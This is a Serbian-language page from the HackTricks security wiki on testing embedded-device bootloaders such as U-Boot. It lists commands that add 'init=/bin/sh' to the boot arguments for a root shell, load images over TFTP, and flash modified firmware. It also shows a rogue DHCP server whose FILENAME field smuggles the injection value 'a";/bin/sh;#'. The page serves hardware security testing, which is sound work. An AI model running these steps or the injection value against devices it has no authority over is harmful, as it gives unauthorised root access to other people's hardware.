hacktricks/hardware-physical-access/firmware-analysis/bootloader-testing.md

3.4 KiB

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Preporučeni koraci za modifikaciju konfiguracija pokretanja uređaja i bootloadera poput U-boot-a su:

  1. Pristup Interpreter Shell-u Bootloader-a:
  • Tokom pokretanja, pritisnite "0", razmak ili druge identifikovane "magične kodove" da biste pristupili interpreter shell-u bootloader-a.
  1. Modifikacija Pokretnih Argumenata:
  • Izvršite sledeće komande da biste dodali 'init=/bin/sh' na pokretne argumente, omogućavajući izvršenje shell komande: %%% #printenv #setenv bootargs=console=ttyS0,115200 mem=63M root=/dev/mtdblock3 mtdparts=sflash: rootfstype= hasEeprom=0 5srst=0 init=/bin/sh #saveenv #boot %%%
  1. Podesite TFTP Server:
  • Konfigurišite TFTP server za učitavanje slika preko lokalne mreže: %%% #setenv ipaddr 192.168.2.2 #lokalna IP adresa uređaja #setenv serverip 192.168.2.1 #IP adresa TFTP servera #saveenv #reset #ping 192.168.2.1 #provera pristupa mreži #tftp ${loadaddr} uImage-3.6.35 #loadaddr uzima adresu za učitavanje fajla i ime fajla slike na TFTP serveru %%%
  1. Iskoristite ubootwrite.py:
  • Koristite ubootwrite.py da napišete U-boot sliku i pošaljete modifikovan firmware kako biste dobili root pristup.
  1. Proverite Debug Funkcije:
  • Verifikujte da li su debug funkcije poput detaljnog logovanja, učitavanje proizvoljnih kernela ili pokretanje sa nepoverenih izvora omogućene.
  1. Oprez pri Mešanju Hardvera:
  • Budite oprezni kada povezujete jedan pin sa zemljom i interagujete sa SPI ili NAND flash čipovima tokom sekvence pokretanja uređaja, posebno pre dekompresije jezgra. Konsultujte datasheet NAND flash čipa pre spajanja pinova.
  1. Podesite Rogue DHCP Server:
  • Postavite rogue DHCP server sa zlonamernim parametrima za uređaj da ih usvoji tokom PXE pokretanja. Iskoristite alate poput Metasploit-ovog (MSF) DHCP pomoćnog servera. Modifikujte parametar 'FILENAME' sa komandama za ubacivanje komandi kao što su 'a";/bin/sh;#' da biste testirali validaciju unosa za postupke pokretanja uređaja.

Napomena: Koraci koji uključuju fizičku interakciju sa pinovima uređaja (*označeni zvezdicom) treba da se pristupe sa ekstremnim oprezom kako bi se izbegla šteta uređaju.

Reference